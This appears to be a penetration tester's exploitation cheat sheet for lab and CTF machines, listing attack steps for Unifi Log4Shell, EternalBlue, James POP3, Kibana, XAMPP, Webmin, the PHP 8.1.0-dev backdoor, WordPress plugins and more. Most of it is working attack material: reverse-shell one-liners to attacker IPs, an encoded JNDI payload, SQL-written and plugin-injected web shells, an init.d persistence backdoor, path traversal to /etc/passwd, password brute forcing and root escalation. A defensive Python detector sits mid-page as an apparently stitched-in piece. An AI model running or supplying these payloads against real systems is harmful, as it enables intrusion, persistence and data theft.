Unifi Log4Shell
Testing: capture an auth attempt in Burp with the creds test:test
Start tcpdump on your host station:
sudo tcpdump -i tun0 port 389
The server will respond with "invalid payload"; however, it still connects back to us. Check tcpdump to confirm the callback.
Now install the required packages:
sudo apt update
sudo apt install openjdk-11-jdk -y
java -version
sudo apt-get install maven
mvn -v
After the payload has been created, start the Rogue-JNDI application, passing the payload to the --command option and your tun0 IP address to the --hostname option.
git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package
echo 'bash -c bash -i >&/dev/tcp/10.10.15.96/9001 0>&1' | base64
java -jar /opt/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuOTYvOTAwMSAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.15.96"
--hostname is the address of your local tun0 interface
Going back to our intercepted POST request, change the payload to ${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat} and click Send.
Apache Struts2
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-title: Santa Naughty and Nice Tracker
search struts2
exploit(multi/http/struts2_content_type_ognl)
Microsoft-ds port 445
445/tcp open microsoft-ds
Run the nmap SMB vulnerability scripts (these cover the EternalBlue and MS08-067 checks):
nmap --script=smb-vuln* $ip
exploit(windows/smb/ms08_067_netapi)
exploit(windows/smb/ms17_010_eternalblue)
Wing FTP Server
Gain access to the admin panel
search lua
exploit(windows/ftp/wing_ftp_admin_exec)
Mantis Bug Tracker
80/tcp open http mantisbt-2.3.0
Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
James POP3
110/tcp open POP3
https://www.exploit-db.com/exploits/35513
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc 172.16.6.2 3333 >/tmp/f
echo "#!/bin/bash" > /etc/init.d/james
echo "bash -i >& /dev/tcp/172.16.6.2/5555 0>&1" >> /etc/init.d/james
cat /etc/init.d/james
sudo /sbin/reboot
Kibana
5601 is the Elasticsearch (Kibana) port, 9200 is the API
curl -X GET "10.10.15.175:9200/_search?q=password&pretty"
{
"took" : 11,
"timed_out" : false,
"_shards" : {
"total" : 6,
"successful" : 6,
"skipped" : 0,
"failed" : 0
},
"hits" : {
"total" : 1,
"max_score" : 2.0136302,
"hits" : [
{
"_index" : "messages",
"_type" : "_doc",
"_id" : "73",
"_score" : 2.0136302,
"_source" : {
"sender" : "mary",
"receiver" : "wendy",
"message" : "hey, can you access my dev account for me. My username is l33tperson and my password is 9Qs58Ol3AXkMWLxiEyUyyf"
If there are log files (for example on port 8000) showing live Kibana logs, there may be an LFI vulnerability.
Go to port 5601 and append this path: /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
10.10.156.71:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
Then curl the logs and grep for root.txt:
curl -s http://10.10.31.117:8000/kibana-log.txt | grep "root.txt"
This can also be used to get a shell in other situations:
https://github.com/mpgn/CVE-2018-17246
Sync Breeze Enterprise
Sync Breeze Enterprise v8.9.24
https://www.exploit-db.com/exploits/40456
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.6.1 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
Microsoft ds
exploit/windows/smb/ms17_010_eternalblue
Android
adb connect [target ip address:port]
Joomla versions 3.6.3
Able to use joomra.py to create an account and log in:
python3 joom.py -u jack -p password -e jack@gmail.com http://10.10.10.10
Can read the config files, which contain the username and password, then SSH in.
XAMPP
Got in through phpMyAdmin [root:no password]
Able to get a shell through SQL commands (writes a web shell into the document root):
SELECT "<?php echo shell_exec($_GET['cmd']); ?>" into outfile "C:/xampp/htdocs/xampp/shell.php";
10.10.10.10/xampp/shell.php?cmd=dir
Look for config files with passwords, e.g.:
C:\xampp\htdocs\admin\config.php
Lucky GetSimple!
10.16.1.2/data/users/lucky.xml
The config file shows the username and the password hash; crack it with john.
PE with dirtycow [CVE-2016-5195]
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
Dolphin Wordpress
Dolphin <7.3.2 Auth bypass / RCE exploit by Ahmed Sultan
Codiad Impresscms
10.10.10.10/codiad/data/users.php
/config.php
/data
/wordspace
Techblog (Wordpress Siteimport Exploit)
http://10.16.1.3/wp-content/plugins/site-import/readme.txt
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=../../../../../../../../../../etc/passwd
wp-config.php file # has the login creds
Backupadmin
Priv esc on a box with Amanda running; found via the LFI exploit:
fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
ls -al /usr/lib/amanda
echo '#!/bin/sh
/bin/sh' > priv.sh
chmod +x priv.sh
/usr/lib/amanda/application/amstar restore --star-path=/tmp/priv.sh
$ whoami
root
mysql Brute Force
mysql on port 3306 is running on the target
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.16.1.11
mysql -u root -h 10.16.1.11 -p
SHOW DATABASES;
SHOW TABLES FROM helpdesk;
USE helpdesk;
SELECT * FROM ost_form_entry;
IP Fire 2.15
Brute-force the admin account; the default is [admin:admin]
https://github.com/0xskunk/IPFire-2.15-Shellshock-Exploit/blob/master/SIPS.py
Webmin 1.8.90
MiniServ 1.890 (Webmin httpd)
https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py
Webmin 1.900
MiniServ 1.900 (Webmin httpd)
Requires credentials in order to exploit.
A Metasploit module can be used once credentials are obtained:
exploit/linux/http/webmin_packageup_rce
PASSWORD Password6543 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.1.17 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME admin yes Webmin Username
cmd/unix/reverse_perl
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
run
[*] Started reverse TCP handler on 10.10.14.2:8888
[+] Session cookie: bda1415ad657230f23aac213aa96a878
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:8888 -> 10.10.110.3:10784) at 2024-04-13 21:21:53 -0400
init.d linux pe
webserv
NAS4Free - web shell via the file editor
Pro FTPD 1.3.5
https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py
TeamCity Linux Priv Esc
The port was only listening locally, so I had to port forward in order to be able to browse to it:
ssh sys-internal@10.10.250.201 -i id_rsa -L 8111:localhost:8111
TeamCity operates on port 8111 by default.
Then I could go to localhost:8111 in my browser.
I was asked for an authentication token to log in as super user.
I was able to find a file called catalina.out; reading its contents provided me the authentication token:
[TeamCity] Super user authentication token: 8119166573167676780
Once you have gained access, create a new project.
Next, fill in the build configuration.
Next, click build steps and use the following command to let /bin/bash run with full root privileges.
Back on the command line, run:
/bin/bash -p
whoami
root
ClipBucket
File upload vulnerability (authenticated):
curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/photo_uploader.php"
curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php"
curl --user developers:9972761drmfsls -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php"
The site will tell you the MD5 hash name of the file and the directory it is located in. Make sure to add the .php extension to the end.
PHP 8.1.0-dev
This version of PHP was backdoored.
Detect it with nikto or by capturing the server response in Burp:
X-Powered-By: PHP/8.1.0-dev
--> this header is what you are looking for
Capture a request in Burp Suite.
Add an additional User-Agentt header to the request (yes, it is supposed to be spelled with two t's):
User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.10.14.13/9001 0>&1"');
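As an added defensive example (not part of these notes), a small Python triage script that flags captured HTTP requests carrying the request-side patterns used above: the Log4Shell ${jndi:} lookup from the Unifi section, the PHP 8.1.0-dev User-Agentt header, and the URL-encoded ../ traversal used against the Kibana console, the site-import plugin and fileinfo.php. The sample requests and hostnames are constructed; the 192.0.2.0/24 range is a documentation range.

```python
"""Flag raw HTTP requests that carry the exploitation patterns noted on this page.
Constructed, offline example for triaging proxy or WAF captures."""
import re
from urllib.parse import unquote

# Indicators taken from the notes above: Log4Shell JNDI lookup string, the
# PHP 8.1.0-dev "User-Agentt" trigger header, and ../ traversal against the
# Kibana console, the site-import plugin and the Backupadmin fileinfo.php.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")
TRAVERSAL_ENDPOINTS = ("/api/console/api_server", "/site-import/admin/page.php", "fileinfo.php")


def parse_request(raw):
    """Split a raw HTTP request into (method, target, {lowercased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method, target = parts[0], parts[1] if len(parts) > 1 else ""
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify_request(raw):
    """Return the list of indicator names matching this request (empty if clean)."""
    _method, target, headers, body = parse_request(raw)
    findings = []
    # Decode twice so %252e-style double encoding also surfaces as "../".
    decoded = unquote(unquote(target + " " + body))
    blob = decoded + " " + " ".join(f"{k}: {v}" for k, v in headers.items())
    if JNDI_RE.search(blob):
        findings.append("log4shell-jndi-lookup")
    if "user-agentt" in headers:  # header name is the trigger, whatever the value
        findings.append("php-8.1.0-dev-backdoor-header")
    if TRAVERSAL_RE.search(decoded):
        known = any(ep in decoded for ep in TRAVERSAL_ENDPOINTS)
        findings.append("path-traversal-known-endpoint" if known else "path-traversal-generic")
    return findings


SAMPLES = {  # constructed requests, not real captures
    "unifi_login": ("POST /api/login HTTP/1.1\r\nHost: unifi.example\r\nContent-Type: application/json\r\n\r\n"
                    '{"username":"test","password":"${jndi:ldap://192.0.2.10:1389/o=tomcat}"}'),
    "php_backdoor": "GET / HTTP/1.1\r\nHost: web.example\r\nUser-Agentt: probe\r\n\r\n",
    "fileinfo_lfi": "GET /fileinfo.php?sha1=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\r\nHost: backup.example\r\n\r\n",
    "benign": "GET /index.html HTTP/1.1\r\nHost: web.example\r\n\r\n",
}


def scan_samples():
    """Classify every constructed sample; returns {name: [indicators]}."""
    return {name: classify_request(raw) for name, raw in SAMPLES.items()}
```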
Open Net Admin (ona)
Metasploit module for command injection in version 18.1.1.
The database file with credentials is located here:
/opt/ona/www/local/config/database_settings.inc.php
Wordpress HelloDolly Plugin
https://yebberdog.medium.com/try-hack-me-jack-walkthrough-904035594dc2
- craft shell from hacktricks
- from revshells.com
<?php $sock=fsockopen("10.10.14.2",80);passthru("/bin/bash <&3 >&3 2>&3"); ?>
- update the Hello Dolly plugin code
File edited successfully.
- now activate it
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
http://10.10.110.100:65000/wordpress/wp-content/plugins/hello.php?cmd=id
- code execution...
uid=33(www-data) gid=33(www-data) groups=33(www-data)